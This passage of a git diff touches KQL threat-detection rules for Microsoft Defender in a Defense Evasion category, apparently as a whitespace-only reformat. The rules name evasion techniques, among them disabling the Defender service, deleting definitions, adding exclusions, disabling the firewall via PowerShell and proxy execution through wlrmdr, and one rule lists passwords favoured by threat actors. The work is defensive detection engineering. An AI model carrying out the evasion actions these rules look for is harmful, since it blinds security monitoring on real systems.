+// Level: medium +// Description: Detects when verclsid.exe is used to run COM object via GUID +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where ((ProcessCommandLine contains "/S" and ProcessCommandLine contains "/C") and (FolderPath endswith "\\verclsid.exe" or ProcessVersionInfoOriginalFileName =~ "verclsid.exe")) and (not(((ProcessCommandLine contains "verclsid.exe\" /S /C {" and ProcessCommandLine contains "} /I {") and InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\RuntimeBroker.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql b/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql index bc434146..1b3bdc3b 100644 --- a/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql +++ b/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql @@ -1,12 +1,12 @@ -// Title: Virtualbox Driver Installation or Starting of VMs -// Author: Janantha Marasinghe -// Date: 2020-09-26 -// Level: low -// Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.006, attack.t1564 -// False Positives: -// - This may have false positives on hosts where Virtualbox is legitimately being used for operations - -DeviceProcessEvents +// Title: Virtualbox Driver Installation or Starting of VMs +// Author: Janantha Marasinghe +// Date: 2020-09-26 +// Level: low +// Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.006, attack.t1564 +// False Positives: +// - This may have false positives on hosts where Virtualbox is legitimately being used for operations + +DeviceProcessEvents | where (ProcessCommandLine contains "VBoxRT.dll,RTR3Init" or ProcessCommandLine contains "VBoxC.dll" or ProcessCommandLine contains "VBoxDrv.sys") or (ProcessCommandLine contains "startvm" or ProcessCommandLine contains "controlvm") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql b/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql index be703a9c..d48b4aca 100644 --- a/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql +++ b/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql @@ -1,12 +1,12 @@ -// Title: Visual Basic Command Line Compiler Usage -// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative -// Date: 2020-10-07 -// Level: high -// Description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027.004 -// False Positives: -// - Utilization of this tool should not be seen in enterprise environment - -DeviceProcessEvents +// Title: Visual Basic Command Line Compiler Usage +// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative +// Date: 2020-10-07 +// Level: high +// Description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.004 +// False Positives: +// - Utilization of this tool should not be seen in enterprise environment + +DeviceProcessEvents | where FolderPath endswith "\\cvtres.exe" and InitiatingProcessFolderPath endswith "\\vbc.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql b/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql index be902c9a..fc73bb67 100644 --- a/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql +++ b/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql @@ -1,10 +1,10 @@ -// Title: Wab Execution From Non Default Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-12 -// Level: high -// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution - -DeviceProcessEvents +// Title: Wab Execution From Non Default Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-12 +// Level: high +// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution + +DeviceProcessEvents | where (FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (not((FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Program Files\\Windows Mail\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Mail\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql b/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql index 593ea03a..23d1fead 100644 --- a/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql +++ b/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql @@ -1,10 +1,10 @@ -// Title: Wab/Wabmig Unusual Parent Or Child Processes -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-12 -// Level: high -// Description: Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution - -DeviceProcessEvents +// Title: Wab/Wabmig Unusual Parent Or Child Processes +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-12 +// Level: high +// Description: Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution + +DeviceProcessEvents | where (InitiatingProcessFolderPath endswith "\\wab.exe" or InitiatingProcessFolderPath endswith "\\wabmig.exe") or ((FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql b/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql index aee95ba2..1fa517ab 100644 --- a/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql +++ b/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql @@ -1,14 +1,14 @@ -// Title: Weak or Abused Passwords In CLI -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-14 -// Level: medium -// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. -// An example would be a threat actor creating a new user via the net command and providing the password inline -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution -// False Positives: -// - Legitimate usage of the passwords by users via commandline (should be discouraged) -// - Other currently unknown false positives - -DeviceProcessEvents +// Title: Weak or Abused Passwords In CLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-14 +// Level: medium +// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. +// An example would be a threat actor creating a new user via the net command and providing the password inline +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution +// False Positives: +// - Legitimate usage of the passwords by users via commandline (should be discouraged) +// - Other currently unknown false positives + +DeviceProcessEvents | where ProcessCommandLine contains "123456789" or ProcessCommandLine contains "123123qwE" or ProcessCommandLine contains "Asd123.aaaa" or ProcessCommandLine contains "Decryptme" or ProcessCommandLine contains "P@ssw0rd!" or ProcessCommandLine contains "Pass8080" or ProcessCommandLine contains "password123" or ProcessCommandLine contains "test@202" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql b/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql index e899bc16..c37cfb49 100644 --- a/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql +++ b/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql @@ -1,10 +1,10 @@ -// Title: WFP Filter Added via Registry -// Author: Frack113 -// Date: 2025-10-23 -// Level: medium -// Description: Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1562, attack.t1569.002 - -DeviceRegistryEvents +// Title: WFP Filter Added via Registry +// Author: Frack113 +// Date: 2025-10-23 +// Level: medium +// Description: Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1562, attack.t1569.002 + +DeviceRegistryEvents | where RegistryKey endswith "\\BFE\\Parameters\\Policy\\Persistent\\Filter*" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql b/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql index 2858ebb0..2a65cb74 100644 --- a/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql +++ b/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql @@ -1,10 +1,10 @@ -// Title: Windows Binaries Write Suspicious Extensions -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-12 -// Level: high -// Description: Detects Windows executables that write files with suspicious extensions -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 - -DeviceFileEvents +// Title: Windows Binaries Write Suspicious Extensions +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-12 +// Level: high +// Description: Detects Windows executables that write files with suspicious extensions +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceFileEvents | where (((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".txt" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")) or ((InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs"))) and (not(((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dllhost.exe" and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\__PSScriptPolicyTest_") and FolderPath endswith ".ps1") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Program Files\\WindowsApps\\Clipchamp" and FolderPath contains ".ps1")) or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe")) and FolderPath endswith ".ps1" and (FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath startswith "C:\\Program Files (x86)\\WindowsApps\\Microsoft.PowerShellPreview")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Windows\\System32\\GroupPolicy\\DataStore\\" and FolderPath contains "\\sysvol\\" and FolderPath contains "\\Policies\\" and FolderPath contains "\\Machine\\Scripts\\Startup\\") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql b/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql index e664bc20..62c27b50 100644 --- a/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql +++ b/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql @@ -1,14 +1,14 @@ -// Title: Windows Defender Context Menu Removed -// Author: Matt Anderson (Huntress) -// Date: 2025-07-09 -// Level: high -// Description: Detects the use of reg.exe or PowerShell to delete the Windows Defender context menu handler registry keys. -// This action removes the "Scan with Microsoft Defender" option from the right-click menu for files, directories, and drives. -// Attackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the security product. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - May be part of a system customization or "debloating" script, but this is highly unusual in a managed corporate environment. - -DeviceProcessEvents +// Title: Windows Defender Context Menu Removed +// Author: Matt Anderson (Huntress) +// Date: 2025-07-09 +// Level: high +// Description: Detects the use of reg.exe or PowerShell to delete the Windows Defender context menu handler registry keys. +// This action removes the "Scan with Microsoft Defender" option from the right-click menu for files, directories, and drives. +// Attackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the security product. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - May be part of a system customization or "debloating" script, but this is highly unusual in a managed corporate environment. + +DeviceProcessEvents | where (ProcessCommandLine contains "del" or ProcessCommandLine contains "Remove-Item" or ProcessCommandLine contains "ri ") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll", "reg.exe"))) and ProcessCommandLine contains "\\shellex\\ContextMenuHandlers\\EPP" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql b/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql index 181d55b8..50cef6d8 100644 --- a/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql +++ b/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql @@ -1,10 +1,10 @@ -// Title: Windows Defender Definition Files Removed -// Author: frack113 -// Date: 2021-07-07 -// Level: high -// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceProcessEvents +// Title: Windows Defender Definition Files Removed +// Author: frack113 +// Date: 2021-07-07 +// Level: high +// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents | where (ProcessCommandLine contains " -RemoveDefinitions" and ProcessCommandLine contains " -All") and (FolderPath endswith "\\MpCmdRun.exe" or ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql b/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql index feb92ebb..fe85c5a5 100644 --- a/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql +++ b/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql @@ -1,12 +1,12 @@ -// Title: Windows Defender Exclusion List Modified -// Author: @BarryShooshooga -// Date: 2019-10-26 -// Level: medium -// Description: Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Intended exclusions by administrators - -DeviceRegistryEvents +// Title: Windows Defender Exclusion List Modified +// Author: @BarryShooshooga +// Date: 2019-10-26 +// Level: medium +// Description: Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Intended exclusions by administrators + +DeviceRegistryEvents | where RegistryKey endswith "\\Microsoft\\Windows Defender\\Exclusions*" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql b/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql index 2e6cac82..c611b785 100644 --- a/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql +++ b/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql @@ -1,12 +1,12 @@ -// Title: Windows Defender Exclusions Added - Registry -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-07-06 -// Level: medium -// Description: Detects the Setting of Windows Defender Exclusions -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Administrator actions - -DeviceRegistryEvents +// Title: Windows Defender Exclusions Added - Registry +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-07-06 +// Level: medium +// Description: Detects the Setting of Windows Defender Exclusions +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrator actions + +DeviceRegistryEvents | where RegistryKey contains "\\Microsoft\\Windows Defender\\Exclusions" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql b/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql index e88fe052..bb34d560 100644 --- a/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql +++ b/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql @@ -1,12 +1,12 @@ -// Title: Windows Defender Service Disabled - Registry -// Author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali -// Date: 2022-08-01 -// Level: high -// Description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Administrator actions - -DeviceRegistryEvents +// Title: Windows Defender Service Disabled - Registry +// Author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali +// Date: 2022-08-01 +// Level: high +// Description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrator actions + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000004)" and RegistryKey endswith "\\Services\\WinDefend\\Start" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql b/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql index 9575bbfd..1496fade 100644 --- a/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql +++ b/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql @@ -1,15 +1,15 @@ -// Title: Windows Defender Threat Severity Default Action Modified -// Author: Matt Anderson (Huntress) -// Date: 2025-07-11 -// Level: high -// Description: Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'. -// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level, -// allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate administration via scripts or tools (e.g., SCCM, Intune, GPO enforcement). Correlate with administrative activity. -// - Software installations that legitimately modify Defender settings (less common for these specific keys). - -DeviceRegistryEvents +// Title: Windows Defender Threat Severity Default Action Modified +// Author: Matt Anderson (Huntress) +// Date: 2025-07-11 +// Level: high +// Description: Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'. +// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level, +// allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administration via scripts or tools (e.g., SCCM, Intune, GPO enforcement). Correlate with administrative activity. +// - Software installations that legitimately modify Defender settings (less common for these specific keys). + +DeviceRegistryEvents | where (RegistryValueData in~ ("DWORD (0x00000006)", "DWORD (0x00000009)")) and RegistryKey endswith "\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction*" and (RegistryKey endswith "\\1" or RegistryKey endswith "\\2" or RegistryKey endswith "\\4" or RegistryKey endswith "\\5") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql b/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql index b82d4d35..faaedb7c 100644 --- a/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql +++ b/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql @@ -1,10 +1,10 @@ -// Title: Windows Firewall Disabled via PowerShell -// Author: Tim Rauch, Elastic (idea) -// Date: 2022-09-14 -// Level: medium -// Description: Detects attempts to disable the Windows Firewall using PowerShell -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562 - -DeviceProcessEvents +// Title: Windows Firewall Disabled via PowerShell +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-14 +// Level: medium +// Description: Detects attempts to disable the Windows Firewall using PowerShell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 + +DeviceProcessEvents | where (ProcessCommandLine contains "Set-NetFirewallProfile " and ProcessCommandLine contains " -Enabled " and ProcessCommandLine contains " False") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains " -All " or ProcessCommandLine contains "Public" or ProcessCommandLine contains "Domain" or ProcessCommandLine contains "Private") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql b/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql index abfc6b7e..6d8929df 100644 --- a/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql +++ b/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql @@ -1,12 +1,12 @@ -// Title: Windows Kernel Debugger Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-15 -// Level: medium -// Description: Detects execution of the Windows Kernel Debugger "kd.exe". -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation -// False Positives: -// - Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required - -DeviceProcessEvents +// Title: Windows Kernel Debugger Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: medium +// Description: Detects execution of the Windows Kernel Debugger "kd.exe". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation +// False Positives: +// - Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required + +DeviceProcessEvents | where FolderPath endswith "\\kd.exe" or ProcessVersionInfoOriginalFileName =~ "kd.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql b/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql index 8edbb364..dac61897 100644 --- a/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql +++ b/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql @@ -1,12 +1,12 @@ -// Title: Windows Processes Suspicious Parent Directory -// Author: vburov -// Date: 2019-02-23 -// Level: low -// Description: Detect suspicious parent processes of well-known Windows processes -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036.005 -// False Positives: -// - Some security products seem to spawn these - -DeviceProcessEvents +// Title: Windows Processes Suspicious Parent Directory +// Author: vburov +// Date: 2019-02-23 +// Level: low +// Description: Detect suspicious parent processes of well-known Windows processes +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036.005 +// False Positives: +// - Some security products seem to spawn these + +DeviceProcessEvents | where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\lsaiso.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe") and (not((((InitiatingProcessFolderPath contains "\\Windows Defender\\" or InitiatingProcessFolderPath contains "\\Microsoft Security Client\\") and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath in~ ("", "-"))) or ((InitiatingProcessFolderPath endswith "\\SavService.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe") or (InitiatingProcessFolderPath contains "\\System32\\" or InitiatingProcessFolderPath contains "\\SysWOW64\\"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql b/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql index f5e81a55..acf268fa 100644 --- a/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql +++ b/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql @@ -1,12 +1,12 @@ -// Title: Winget Admin Settings Modification -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-17 -// Level: low -// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence -// False Positives: -// - The event doesn't contain information about the type of change. False positives are expected with legitimate changes - -DeviceRegistryEvents +// Title: Winget Admin Settings Modification +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-17 +// Level: low +// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence +// False Positives: +// - The event doesn't contain information about the type of change. False positives are expected with legitimate changes + +DeviceRegistryEvents | where InitiatingProcessFolderPath endswith "\\winget.exe" and RegistryKey endswith "\\LocalState\\admin_settings" and RegistryKey =~ "\\REGISTRY\\A*" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql b/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql index d182d027..2b160075 100644 --- a/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql +++ b/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql @@ -1,11 +1,11 @@ -// Title: Wlrmdr.EXE Uncommon Argument Or Child Process -// Author: frack113, manasmbellani -// Date: 2022-02-16 -// Level: medium -// Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries. -// This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Wlrmdr.EXE Uncommon Argument Or Child Process +// Author: frack113, manasmbellani +// Date: 2022-02-16 +// Level: medium +// Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries. +// This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\wlrmdr.exe" or (((ProcessCommandLine contains "-a " or ProcessCommandLine contains "/a " or ProcessCommandLine contains "–a " or ProcessCommandLine contains "—a " or ProcessCommandLine contains "―a ") and (ProcessCommandLine contains "-f " or ProcessCommandLine contains "/f " or ProcessCommandLine contains "–f " or ProcessCommandLine contains "—f " or ProcessCommandLine contains "―f ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "/m " or ProcessCommandLine contains "–m " or ProcessCommandLine contains "—m " or ProcessCommandLine contains "―m ") and (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessCommandLine contains "-t " or ProcessCommandLine contains "/t " or ProcessCommandLine contains "–t " or ProcessCommandLine contains "—t " or ProcessCommandLine contains "―t ") and (ProcessCommandLine contains "-u " or ProcessCommandLine contains "/u " or ProcessCommandLine contains "–u " or ProcessCommandLine contains "—u " or ProcessCommandLine contains "―u ") and (FolderPath endswith "\\wlrmdr.exe" or ProcessVersionInfoOriginalFileName =~ "WLRMNDR.EXE")) and (not(((InitiatingProcessFolderPath in~ ("", "-")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\winlogon.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql b/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql index 45ad31ac..56bf5a65 100644 --- a/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql +++ b/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql 